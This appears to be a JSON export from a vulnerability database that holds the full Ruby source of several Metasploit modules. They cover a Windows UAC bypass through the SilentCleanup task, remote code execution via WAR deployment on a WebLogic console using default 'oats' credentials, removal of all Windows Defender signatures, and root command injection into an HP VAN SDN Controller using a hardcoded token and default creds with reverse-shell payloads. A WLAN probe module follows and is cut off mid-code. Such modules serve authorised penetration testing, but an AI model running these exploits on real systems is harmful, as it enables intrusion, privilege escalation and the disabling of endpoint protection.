{"metasploit": [{"lastseen": "2019-11-18T12:54:30", "bulletinFamily": "exploit", "description": "There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.\n", "modified": "2019-07-02T17:36:07", "published": "2019-06-20T17:53:54", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BYPASSUAC_SILENTCLEANUP", "href": "", "type": "metasploit", "title": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::Powershell\n include Msf::Post::Windows::Priv\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',\n 'Description' => %q{\n There's a task in Windows Task Scheduler called \"SilentCleanup\" which, while it's executed as Users, automatically runs with elevated privileges.\n When it runs, it executes the file %windir%\\system32\\cleanmgr.exe. 
Since it runs as Users, and we can control user's environment variables,\n %windir% (normally pointing to C:\\Windows) can be changed to point to whatever we want, and it'll run as admin.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'tyranid', # Discovery\n 'enigma0x3', # Discovery\n 'nyshone69', # Discovery\n 'lokiuox', # PSH script\n 'Carter Brainerd (cbrnrd)' # Metasploit Module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter', 'shell'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Microsoft Windows', {}]],\n 'DisclosureDate' => 'Feb 24 2019',\n 'References' => [\n ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],\n ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],\n ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],\n ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']\n ]\n ))\n\n register_options(\n [\n OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),\n OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', \"%WINDIR%\\\\System32\\\\WindowsPowershell\\\\v1.0\\\\powershell.exe\"])\n ])\n end\n\n def get_bypass_script(cmd)\n scr = %Q{\n if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match \"S-1-5-32-544\")) {\n #{cmd}\n } else {\n $registryPath = \"HKCU:\\\\Environment\"\n $Name = \"windir\"\n $Value = \"powershell -ExecutionPolicy bypass -windowstyle hidden -Command `\"& `'$PSCommandPath`'`\";#\"\n Set-ItemProperty -Path $registryPath -Name $name -Value $Value\n #Depending on the performance of the machine, some sleep time may be required before or after schtasks\n Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}\n schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I | Out-Null\n Remove-ItemProperty -Path $registryPath -Name $name\n }\n }\n vprint_status(scr)\n 
scr\n end\n\n def exploit\n check_permissions\n\n e_vars = get_envs('TEMP')\n payload_fp = \"#{e_vars['TEMP']}\\\\#{rand_text_alpha(8)}.ps1\"\n\n # Write it to disk, run, delete\n upload_payload_ps1(payload_fp)\n vprint_good(\"Payload uploaded to #{payload_fp}\")\n\n cmd_exec(\"#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}\")\n end\n\n def check_permissions\n # Check if you are an admin\n case is_in_admin_group?\n when nil\n print_error('Either whoami is not there or failed to execute')\n print_error('Continuing under assumption you already checked...')\n when true\n print_good('Part of Administrators group! Continuing...')\n when false\n fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')\n end\n\n if get_integrity_level == INTEGRITY_LEVEL_SID[:low]\n fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')\n end\n end\n\n def upload_payload_ps1(filepath)\n pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)\n begin\n vprint_status('Uploading payload PS1...')\n write_file(filepath, get_bypass_script(pld))\n register_file_for_cleanup(filepath)\n rescue Rex::Post::Meterpreter::RequestError => e\n fail_with(Failure::Unknown, \"Error uploading file #{filepath}: #{e.class} #{e}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bypassuac_silentcleanup.rb"}, {"lastseen": "2019-11-30T10:27:56", "bulletinFamily": "exploit", "description": "This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. 
Authentication is required, however by default, Oracle ships with a \"oats\" account that you could log in with, which grants you administrator access.\n", "modified": "2019-05-24T15:06:47", "published": "2019-05-10T18:27:08", "id": "MSF:EXPLOIT/WINDOWS/HTTP/OATS_WEBLOGIC_CONSOLE", "href": "", "type": "metasploit", "title": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment',\n 'Description' => %q{\n This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Steven Seeley', # Used the trick and told me about it\n 'sinn3r' # Metasploit module\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'WebLogic Server Administration Console 12 or prior', { } ]\n ],\n 'References' =>\n [\n # The CVE description matches what this exploit is doing, but it was for version\n # 9.0 and 9.1. 
We are not super sure whether this is the right CVE or not.\n # ['CVE', '2007-2699']\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 8088\n },\n 'Notes' =>\n {\n 'SideEffects' => [ IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'Privileged' => false,\n 'DisclosureDate' => 'Mar 13 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),\n OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']),\n OptString.new('OATSPASSWORD', [true, 'The password for the admin console'])\n ])\n\n register_advanced_options(\n [\n OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\\\OracleATS'])\n ])\n end\n\n class LoginSpec\n attr_accessor :admin_console_session\n end\n\n def login_spec\n @login_spec ||= LoginSpec.new\n end\n\n class OatsWarPayload < MetasploitModule\n attr_reader :name\n attr_reader :war\n\n def initialize(payload)\n @name = [Faker::App.name, Rex::Text.rand_name].sample\n @war = payload.encoded_war(app_name: name).to_s\n end\n end\n\n def default_oats_path\n datastore['DefaultOatsPath']\n end\n\n def war_payload\n @war_payload ||= OatsWarPayload.new(payload)\n end\n\n def set_frsc\n value = get_deploy_frsc\n @frsc = value\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n })\n\n if res && res.body.include?('Oracle WebLogic Server Administration Console')\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def set_admin_console_session(res)\n cookie = res.get_cookies\n admin_console_session = cookie.scan(/ADMINCONSOLESESSION=(.+);/).flatten.first\n vprint_status(\"Token for console session is: #{admin_console_session}\")\n login_spec.admin_console_session = admin_console_session\n end\n\n def is_logged_in?(res)\n html = res.get_html_document\n a_element = 
html.at('a')\n if a_element.respond_to?(:attributes) && a_element.attributes['href']\n link = a_element.attributes['href'].value\n return URI(link).request_uri == '/console'\n end\n\n false\n end\n\n def do_login\n uri = normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp')\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n set_admin_console_session(res)\n\n uri = normalize_uri(target_uri.path, 'console', 'j_security_check')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_post' =>\n {\n 'j_username' => datastore['OATSUSERNAME'],\n 'j_password' => datastore['OATSPASSWORD'],\n 'j_character_encoding' => 'UTF-8'\n }\n })\n\n fail_with(Failure::Unknown, 'No response while trying to log in') unless res\n fail_with(Failure::NoAccess, 'Failed to login') unless is_logged_in?(res)\n store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])\n set_admin_console_session(res)\n end\n\n def get_deploy_frsc\n # First we are just going through the pages in a specific order to get the FRSC value\n # we need to prepare uploading the WAR file.\n res = nil\n requests =\n [\n { path: 'console/', vars: {} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\"} },\n { path: 'console/console.portal', vars: {'_nfpb'=>\"true\", '_pageLabel' => 'HomePage1'} }\n ]\n\n requests.each do |req|\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, req[:path]),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' => req[:vars]\n })\n\n fail_with(Failure::Unknown, 'No response while retrieving FRSC') unless res\n end\n\n html = res.get_html_document\n hidden_input = html.at('input[@name=\"ChangeManagerPortletfrsc\"]')\n frsc_attr = hidden_input.respond_to?(:attributes) ? 
hidden_input.attributes['value'] : nil\n frsc_attr ? frsc_attr.value : ''\n end\n\n def do_select_upload_action\n action = '/com/bea/console/actions/app/install/selectUploadApp'\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\\\servers\\\\AdminServer\\\\upload')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_upload_app_action\n action = '/com/bea/console/actions/app/install/uploadApp'\n ctype = 'application/octet-stream'\n app_cname = 'AppApplicationInstallPortletuploadAppPath'\n plan_cname = 'AppApplicationInstallPortletuploadPlanPath'\n frsc_cname = 'AppApplicationInstallPortletfrsc'\n war = war_payload.war\n war_name = war_payload.name\n post_data = Rex::MIME::Message.new\n post_data.add_part(war, ctype, 'binary', \"form-data; name=\\\"#{app_cname}\\\"; filename=\\\"#{war_name}.war\\\"\")\n post_data.add_part('', ctype, nil, \"form-data; name=\\\"#{plan_cname}\\\"; filename=\\\"\\\"\")\n post_data.add_part(frsc, nil, nil, \"form-data; name=\\\"#{frsc_cname}\\\"\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_app_select_action\n action = 
'/com/bea/console/actions/app/install/appSelected'\n war_name = war_payload.name\n app_path = Rex::FileUtils.normalize_win_path(default_oats_path, \"oats\\\\servers\\\\AdminServer\\\\upload\\\\#{war_name}.war\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletselectedAppPath' => app_path,\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n end\n\n def do_style_select_action\n action = '/com/bea/console/actions/app/install/targetStyleSelected'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortlettargetStyle' => 'Application',\n 'AppApplicationInstallPortletfrsc' => frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n end\n\n def do_finish_action\n action = '/com/bea/console/actions/app/install/finish'\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationInstallPortlet_actionOverride' => action\n },\n 'vars_post' =>\n {\n 'AppApplicationInstallPortletname' => war_payload.name,\n 'AppApplicationInstallPortletsecurityModel' => 'DDOnly',\n 'AppApplicationInstallPortletstagingStyle' => 'Default',\n 'AppApplicationInstallPortletplanStagingStyle' => 'Default',\n 'AppApplicationInstallPortletfrsc' 
=> frsc\n }\n })\n\n fail_with(Failure::Unknown, \"No response from #{action}\") unless res\n print_response_message(res)\n\n # 302 is a good enough indicator of a successful upload, otherwise\n # the server would actually return a 200 with an error message.\n res.code == 302\n end\n\n def print_response_message(res)\n html = res.get_html_document\n message_div = html.at('div[@class=\"message\"]')\n if message_div\n msg = message_div.at('span').text\n print_status(\"Server replies: #{msg.inspect}\")\n end\n end\n\n def deploy_war\n set_frsc\n print_status(\"FRSC value: #{frsc}\")\n do_select_upload_action\n do_upload_app_action\n do_app_select_action\n do_style_select_action\n do_finish_action\n end\n\n def goto_war(name)\n print_good(\"Operation \\\"#{name}\\\" is a go!\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, name)\n })\n\n print_status(\"Code #{res.code} on \\\"#{name}\\\" request\") if res\n end\n\n def undeploy_war\n war_name = war_payload.name\n handle = 'com.bea.console.handles.JMXHandle(\"com.bea:Name=oats,Type=Domain\")'\n contents = %Q|com.bea.console.handles.AppDeploymentHandle(\"com.bea:Name=#{war_name},Type=AppDeployment\")|\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'console', 'console.portal'),\n 'cookie' => \"ADMINCONSOLESESSION=#{login_spec.admin_console_session}\",\n 'vars_get' =>\n {\n 'AppApplicationUninstallPortletreturnTo' => 'AppDeploymentsControlPage',\n 'AppDeploymentsControlPortlethandle' => handle\n },\n 'vars_post' =>\n {\n # For some reason, the value given to the server is escapped twice.\n # The Metasploit API should do it at least once.\n 'AppApplicationUninstallPortletchosenContents' => CGI.escape(contents),\n '_pageLabel' => 'AppApplicationUninstallPage',\n '_nfpb' => 'true',\n 'AppApplicationUninstallPortletfrsc' => frsc\n }\n })\n\n if res && res.code == 302\n print_good(\"Successfully undeployed #{war_name}.war\")\n else\n 
print_warning(\"Unable to successfully undeploy #{war_name}.war\")\n print_warning('You may want to do so manually.')\n end\n end\n\n def cleanup\n undeploy_war if is_cleanup_ready\n super\n end\n\n def setup\n @is_cleanup_ready = false\n super\n end\n\n def exploit\n unless check == Exploit::CheckCode::Detected\n print_status('Target does not have the login page we are looking for.')\n return\n end\n\n do_login\n print_good(\"Logged in as #{datastore['OATSUSERNAME']}:#{datastore['OATSPASSWORD']}\")\n print_status(\"Ready for war. Codename \\\"#{war_payload.name}\\\" at #{war_payload.war.length} bytes\")\n result = deploy_war\n if result\n @is_cleanup_ready = true\n goto_war(war_payload.name)\n end\n end\n\n attr_reader :frsc\n attr_reader :is_cleanup_ready\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/oats_weblogic_console.rb"}, {"lastseen": "2019-11-24T21:33:06", "bulletinFamily": "exploit", "description": "This module with appropriate rights let to use the Windows Defender command-line utility a run and automation tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine. 
The tool is prominently used for scheduling scans and updating the signature or definition files, but there is a switch created to restore the installed signature definitions to a previous backup copy or to the original default set of signatures which is none, disabling all the signatures and allowing malware to execute even with the Windows Defender solution enabled.\n", "modified": "2018-11-30T22:41:40", "published": "2018-11-30T21:20:34", "id": "MSF:POST/WINDOWS/MANAGE/ROLLBACK_DEFENDER_SIGNATURES", "href": "", "type": "metasploit", "title": "Disable Windows Defender Signatures", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Registry\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Disable Windows Defender Signatures',\n 'Description' => %q{\n This module with appropriate rights let to use the Windows Defender command-line utility a run and automation\n tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.\n The tool is prominently used for scheduling scans and updating the signature or definition files,\n but there is a switch created to restore the installed signature definitions to a previous backup copy or\n to the original default set of signatures which is none, disabling all the signatures and allowing malware\n to execute even with the Windows Defender solution enabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['metasploit@[at]csiete.org',\n 'luisco100 <luisco100[at]gmail.com>'], # Module author\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n ))\n register_options(\n [\n OptEnum.new('ACTION', [ true, 'Action to perform (Update/Rollback)', 'Rollback', ['rollback', 'update']])\n ])\n end\n\n def run\n #Are we system?\n if 
not is_system?()\n fail_with(Failure::NoAccess, \"You must be System to run this Module\")\n end\n #Is the binary there?\n program_path = session.sys.config.getenv('ProgramFiles')\n vprint_status(\"program_path = #{program_path}\")\n file_path = program_path + '\\Windows Defender\\MpCmdRun.exe'\n vprint_status(\"file_path = #{file_path}\")\n if not exist?(file_path)\n fail_with(Failure::NoAccess, \"#{file_path} is not Present\")\n end\n #Is defender even enabled?\n defender_disable_key = \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\"\n disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, \"DisableAntiSpyware\", REGISTRY_VIEW_NATIVE)\n if disable_key_value.nil? || disable_key_value != 1\n print_status(\"Removing All Definitions for Windows Defender\")\n print_status(datastore['ACTION'])\n if datastore['ACTION'].casecmp('Rollback') == 0\n cmd = \"cmd.exe /c \\\"#{file_path}\\\" -RemoveDefinitions -All\"\n else\n cmd = \"cmd.exe /c \\\"#{file_path}\\\" -SignatureUpdate\"\n end\n print_status(\"Running #{cmd}\")\n output = cmd_exec(cmd)\n if output.include?('denied')\n print_bad(\"#{output}\")\n else\n print_status(\"#{output}\")\n end\n else\n fail_with(Failure::BadConfig, \"Defender is not Enabled\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/manage/rollback_defender_signatures.rb"}, {"lastseen": "2019-11-29T20:34:25", "bulletinFamily": "exploit", "description": "This module exploits a hardcoded service token or default credentials in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root. A root command injection was discovered in the uninstall action's name parameter, obviating the need to use sudo for privilege escalation. If the service token option TOKEN is blank, USERNAME and PASSWORD will be used for authentication. 
An additional login request will be sent.\n", "modified": "2019-06-24T18:38:14", "published": "2018-07-05T18:30:55", "id": "MSF:EXPLOIT/LINUX/HTTP/HP_VAN_SDN_CMD_INJECT", "href": "", "type": "metasploit", "title": "HP VAN SDN Controller Root Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n # server: grizzly/2.2.16\n HttpFingerprint = {pattern: [/^grizzly/]}\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP VAN SDN Controller Root Command Injection',\n 'Description' => %q{\n This module exploits a hardcoded service token or default credentials\n in HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root.\n\n A root command injection was discovered in the uninstall action's name\n parameter, obviating the need to use sudo for privilege escalation.\n\n If the service token option TOKEN is blank, USERNAME and PASSWORD will\n be used for authentication. 
An additional login request will be sent.\n },\n 'Author' => [\n 'Matt Bergin', # Vulnerability discovery and Python exploit\n 'wvu' # Metasploit module and additional ~research~\n ],\n 'References' => [\n ['EDB', '44951'],\n ['URL', 'https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt']\n ],\n 'DisclosureDate' => '2018-06-25',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Unix In-Memory',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'Payload' => {'BadChars' => ' '},\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'}\n ],\n ['Linux Dropper',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {'SSL' => true}\n ))\n\n register_options([\n OptPort.new('RPORT', [true, 'REST API port', 8081]),\n OptPort.new('WEBUI_PORT', [true, 'Web UI port for creds login', 8443]),\n OptString.new('TOKEN', [false, 'Service token', 'AuroraSdnToken37']),\n OptString.new('USERNAME', [false, 'Service username', 'sdn']),\n OptString.new('PASSWORD', [false, 'Service password', 'skyline'])\n ])\n\n register_advanced_options([\n OptString.new('PayloadName', [false, 'Payload name (random if unset)']),\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n end\n\n def post_auth?\n true\n end\n\n def default_credential?\n true\n end\n\n def check\n checkcode = CheckCode::Safe\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/',\n 'headers' => {'X-Auth-Token' => auth_token},\n 'ctype' => 'application/json',\n 'data' => {'action' => 'uninstall'}.to_json\n )\n\n if res.nil?\n checkcode = CheckCode::Unknown\n elsif res && res.code == 400 && res.body.include?('Missing field: name')\n checkcode = CheckCode::Appears\n elsif res && res.code == 
401 && res.body =~ /Missing|Invalid token/\n checkcode = CheckCode::Safe\n end\n\n checkcode\n end\n\n def exploit\n if [CheckCode::Safe, CheckCode::Unknown].include?(check)\n if datastore['ForceExploit']\n print_warning('ForceExploit set! Exploiting anyway!')\n else\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n end\n\n if target['Type'] == :unix_memory\n print_status('Executing command payload')\n execute_command(payload.encoded)\n return\n end\n\n print_status('Uploading payload as fake .deb')\n payload_path = upload_payload\n renamed_path = payload_path.gsub(/\\.deb$/, '')\n\n register_file_for_cleanup(renamed_path)\n\n print_status('Renaming payload and executing it')\n execute_command(\n \"mv #{payload_path} #{renamed_path} && \" \\\n \"chmod +x #{renamed_path}\"\n )\n execute_command(renamed_path)\n end\n\n def upload_payload\n payload_name = datastore['PayloadName'] ?\n \"#{datastore['PayloadName']}.deb\" :\n \"#{Rex::Text.rand_text_alphanumeric(8..42)}.deb\"\n payload_path = \"/var/lib/sdn/uploads/#{payload_name}\"\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/upload',\n 'headers' => {'Filename' => payload_name, 'X-Auth-Token' => auth_token},\n 'ctype' => 'application/octet-stream',\n 'data' => generate_payload_exe\n )\n\n unless res && res.code == 200 && res.body.include?('{ }')\n fail_with(Failure::UnexpectedReply, \"Failed to upload #{payload_path}\")\n end\n\n print_good(\"Uploaded #{payload_path}\")\n\n payload_path\n end\n\n def execute_command(cmd)\n # Argument injection in /opt/sdn/admin/uninstall-dpkg\n injection = \"--pre-invoke=#{cmd}\"\n\n # Ensure we don't undergo word splitting\n injection = injection.gsub(/\\s+/, '${IFS}')\n\n print_status(\"Injecting dpkg -r #{injection}\")\n\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => '/',\n 'headers' => {'X-Auth-Token' => auth_token},\n 'ctype' => 'application/json',\n 'data' => {'action' => 'uninstall', 'name' => injection}.to_json\n }, 0)\n end\n\n 
def auth_token\n return @auth_token if @auth_token\n\n token = datastore['TOKEN']\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n if token && !token.empty?\n print_status(\"Authenticating with service token #{token}\")\n @auth_token = token\n return @auth_token\n end\n\n print_status(\"Authenticating with creds #{username}:#{password}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/sdn/ui/app/login',\n 'rport' => datastore['WEBUI_PORT'],\n 'vars_post' => {'username' => username, 'password' => password}\n )\n\n unless res && res.get_cookies.include?('X-Auth-Token')\n print_error('Invalid username and/or password specified')\n return\n end\n\n @auth_token = res.get_cookies_parsed['X-Auth-Token'].first\n print_good(\"Retrieved auth token #{@auth_token}\")\n\n @auth_token\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb"}, {"lastseen": "2019-11-30T16:33:30", "bulletinFamily": "exploit", "description": "This module send probe requests through the wlan interface. 
The ESSID field will be use to set a custom message.\n", "modified": "2018-05-03T09:41:09", "published": "2018-04-11T14:43:33", "id": "MSF:POST/WINDOWS/WLAN/WLAN_PROBE_REQUEST", "href": "", "type": "metasploit", "title": "Windows Send Probe Request Packets", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Send Probe Request Packets',\n 'Description' => %q{\n This module send probe requests through the wlan interface.\n The ESSID field will be use to set a custom message.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options(\n [\n OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),\n OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', '30'])\n ])\n end\n\n def run\n ssid = datastore['SSID']\n time = datastore['TIMEOUT']\n\n if ssid.length > 32\n print_error(\"The SSID must be equal to or less than 32 bytes\")\n return\n end\n\n mypid = client.sys.process.getpid\n @host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)\n @wlanapi = client.railgun.wlanapi\n\n wlan_handle = open_handle()\n unless wlan_handle\n print_error(\"Couldn't open WlanAPI Handle. 
WLAN API may not be installed on target\")\n print_error(\"On Windows XP this could also mean the Wireless Zero Configuration Service is turned off\")\n return\n end\n\n # typedef struct _DOT11_SSID {\n # ULONG uSSIDLength;\n # UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];\n # } DOT11_SSID, *PDOT11_SSID;\n pDot11Ssid = [ssid.length].pack(\"L<\") << ssid\n wlan_iflist = enum_interfaces(wlan_handle)\n if wlan_iflist.length == 0\n print_status(\"Wlan interfaces not found\")\n return\n end\n\n print_status(\"Wlan interfaces found: #{wlan_iflist.length}\")\n print_status(\"Sending probe requests for #{time} seconds\")\n begin\n ::Timeout.timeout(time) do\n while true\n wlan_iflist.each do |interface|\n vprint_status(\"Interface Guid: #{interface['guid'].unpack('H*')[0]}\")\n vprint_status(\"Interface State: #{interface['state']}\")\n vprint_status(\"DOT11_SSID payload: #{pDot11Ssid.chars.map {|c| c.ord.to_s(16) }.join(':')}\")\n @wlanapi.WlanScan(wlan_handle,interface['guid'],pDot11Ssid,nil,nil)\n sleep(10)\n end\n end\n end\n rescue ::Timeout::Error\n closehandle = @wlanapi.WlanCloseHandle(wlan_handle,nil)\n if closehandle['return'] == 0\n print_status(\"WlanAPI Handle closed successfully\")\n else\n print_error(\"There was an error closing the Handle\")\n end\n end\n end\n\n # Function borrowed from @theLightCosine wlan_* modules\n def open_handle\n begin\n wlhandle = @wlanapi.WlanOpenHandle(2,nil,4,4)\n rescue\n return nil\n end\n return wlhandle['phClientHandle']\n end\n\n # Function borrowed from @theLightCosine wlan_* modules\n def enum_interfaces(wlan_handle)\n\n iflist = @wlanapi.WlanEnumInterfaces(wlan_handle,nil,4)\n pointer= iflist['ppInterfaceList']\n\n numifs = @host_process.memory.read(pointer,4)\n numifs = numifs.unpack(\"V\")[0]\n\n interfaces = []\n\n #Set the pointer ahead to the first element in the array\n pointer = (pointer + 8)\n (1..numifs).each do |i|\n interface = {}\n #Read the GUID (16 